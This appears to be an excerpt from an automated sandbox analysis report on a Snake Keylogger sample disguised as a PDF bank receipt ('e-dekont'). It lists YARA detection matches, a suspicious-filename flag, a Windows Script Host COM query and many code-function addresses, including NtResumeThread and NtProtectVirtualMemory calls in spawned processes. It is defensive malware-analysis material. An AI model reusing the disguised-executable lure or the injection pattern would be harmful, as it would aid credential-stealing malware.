              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: e-dekont (72).pdf(#U007e56 KB).exe
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C867D0 NtResumeThread,0_2_06C867D0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C85798 NtProtectVirtualMemory,0_2_06C85798
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C867CB NtResumeThread,0_2_06C867CB
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C85790 NtProtectVirtualMemory,0_2_06C85790
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA67D0 NtResumeThread,4_2_06DA67D0
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA5798 NtProtectVirtualMemory,4_2_06DA5798
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA67C8 NtResumeThread,4_2_06DA67C8
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA5790 NtProtectVirtualMemory,4_2_06DA5790
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E119A00_2_02E119A0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E17C380_2_02E17C38
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E11D970_2_02E11D97
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E13E280_2_02E13E28
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E11E390_2_02E11E39
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E13E180_2_02E13E18
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_02E17C290_2_02E17C29
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_059980080_2_05998008
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_05997F730_2_05997F73
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_059986880_2_05998688
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_059986790_2_05998679
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD5DE80_2_06AD5DE8
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9F880_2_06AD9F88
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AD9F830_2_06AD9F83
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADE2290_2_06ADE229
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06ADE2380_2_06ADE238
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE8F500_2_06AE8F50
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE1EB00_2_06AE1EB0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE1E870_2_06AE1E87
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE8F400_2_06AE8F40
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE94AF0_2_06AE94AF
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE00330_2_06AE0033
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AEC07F0_2_06AEC07F
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE00400_2_06AE0040
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE79B00_2_06AE79B0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE79C00_2_06AE79C0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06AE797B0_2_06AE797B
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C3215C0_2_06C3215C
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C35E1F0_2_06C35E1F
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C319000_2_06C31900
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C374280_2_06C37428
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C361470_2_06C36147
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C318CF0_2_06C318CF
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C329C90_2_06C329C9
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C329D80_2_06C329D8
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C81D180_2_06C81D18
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C8304B0_2_06C8304B
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C88A080_2_06C88A08
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06C88A030_2_06C88A03
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06CF00400_2_06CF0040
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06CF00230_2_06CF0023
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06FAEFB00_2_06FAEFB0
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06FAE3980_2_06FAE398
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06F900400_2_06F90040
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 0_2_06F900060_2_06F90006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5F0172_2_00C5F017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C561202_2_00C56120
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C535722_2_00C53572
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5B5022_2_00C5B502
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C546D92_2_00C546D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5B7E62_2_00C5B7E6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C567482_2_00C56748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5C7622_2_00C5C762
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5BAC72_2_00C5BAC7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5CA422_2_00C5CA42
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5BDA22_2_00C5BDA2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5E5372_2_00C5E537
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_00C5E5382_2_00C5E538
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555BD382_2_0555BD38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555C9D82_2_0555C9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05558C5F2_2_05558C5F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555A4082_2_0555A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555D0282_2_0555D028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555B0A02_2_0555B0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555C3882_2_0555C388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555AA582_2_0555AA58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555D6702_2_0555D670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055586082_2_05558608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555B6E82_2_0555B6E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05557D572_2_05557D57
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05557D582_2_05557D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05550D482_2_05550D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055579002_2_05557900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05550D392_2_05550D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555BD282_2_0555BD28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555C9D72_2_0555C9D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055585FC2_2_055585FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055511912_2_05551191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055551982_2_05555198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555518A2_2_0555518A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055581B02_2_055581B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055511A02_2_055511A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055581AF2_2_055581AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055570502_2_05557050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055500402_2_05550040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055570402_2_05557040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055528182_2_05552818
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555D0182_2_0555D018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055528072_2_05552807
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555A4072_2_0555A407
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055500062_2_05550006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055544302_2_05554430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055508F02_2_055508F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055578FF2_2_055578FF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055508E02_2_055508E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055504972_2_05550497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055574972_2_05557497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055504982_2_05550498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555B08F2_2_0555B08F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055574A82_2_055574A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055567772_2_05556777
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055567782_2_05556778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555C3782_2_0555C378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555631F2_2_0555631F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055537302_2_05553730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055563202_2_05556320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05556BD02_2_05556BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05556BCF2_2_05556BCF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055533B82_2_055533B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055533A82_2_055533A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555AA572_2_0555AA57
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05555A702_2_05555A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05555A602_2_05555A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555D6632_2_0555D663
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_055556182_2_05555618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555560A2_2_0555560A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05555EC72_2_05555EC7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05555EC82_2_05555EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0555B6E72_2_0555B6E7
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_017019A04_2_017019A0
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_01701D974_2_01701D97
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_01707C384_2_01707C38
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_01707C294_2_01707C29
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_01701E394_2_01701E39
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_01703E284_2_01703E28
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_01703E184_2_01703E18
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C65A984_2_06C65A98
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C69F884_2_06C69F88
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C69F794_2_06C69F79
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C6E2284_2_06C6E228
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C6E2384_2_06C6E238
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C88F504_2_06C88F50
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C81EB04_2_06C81EB0
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C88F404_2_06C88F40
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C894AF4_2_06C894AF
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C800404_2_06C80040
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C8C07F4_2_06C8C07F
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C8003A4_2_06C8003A
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C879C04_2_06C879C0
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C879B04_2_06C879B0
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06C879784_2_06C87978
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D5215C4_2_06D5215C
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D55E1E4_2_06D55E1E
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D598704_2_06D59870
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D519004_2_06D51900
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D574284_2_06D57428
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D561474_2_06D56147
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D518CF4_2_06D518CF
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D529D84_2_06D529D8
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06D529C94_2_06D529C9
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA1D184_2_06DA1D18
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA303F4_2_06DA303F
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA8A084_2_06DA8A08
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA89F84_2_06DA89F8
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06DA89704_2_06DA8970
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E26BAE4_2_06E26BAE
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E271204_2_06E27120
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E271284_2_06E27128
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E271184_2_06E27118
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E2711C4_2_06E2711C
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E900404_2_06E90040
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_06E900274_2_06E90027
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_0714EFB04_2_0714EFB0
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_0714E3984_2_0714E398
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_071300264_2_07130026
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4_2_071300404_2_07130040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031E61086_2_031E6108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EC1906_2_031EC190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EF0076_2_031EF007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EC7516_2_031EC751
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EC4706_2_031EC470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EB4A06_2_031EB4A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EBBD36_2_031EBBD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031ECA316_2_031ECA31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031E4AD96_2_031E4AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031E98586_2_031E9858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031E68806_2_031E6880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EBEB06_2_031EBEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EE5176_2_031EE517
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EE5286_2_031EE528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031E35706_2_031E3570
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_031EB4F36_2_031EB4F3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0B6E86_2_06D0B6E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0AA586_2_06D0AA58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0D6706_2_06D0D670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D086086_2_06D08608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0C3886_2_06D0C388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0B0A06_2_06D0B0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D08C516_2_06D08C51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0A4086_2_06D0A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0D0286_2_06D0D028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0C9D86_2_06D0C9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D011A06_2_06D011A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0BD386_2_06D0BD38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0B6D96_2_06D0B6D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D05EC86_2_06D05EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D05EB86_2_06D05EB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0AA486_2_06D0AA48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D05A706_2_06D05A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D05A606_2_06D05A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0D6616_2_06D0D661
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D056186_2_06D05618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D056096_2_06D05609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D06BD06_2_06D06BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D06BC16_2_06D06BC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0A3F86_2_06D0A3F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D033B86_2_06D033B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D033A86_2_06D033A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D067786_2_06D06778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0C3786_2_06D0C378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0676A6_2_06D0676A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D063116_2_06D06311
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D037306_2_06D03730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D063206_2_06D06320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D008F06_2_06D008F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D078F06_2_06D078F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D008E06_2_06D008E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D074976_2_06D07497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D004986_2_06D00498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D004886_2_06D00488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D0B08F6_2_06D0B08F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D074A86_2_06D074A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D070506_2_06D07050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06D000406_2_06D00040
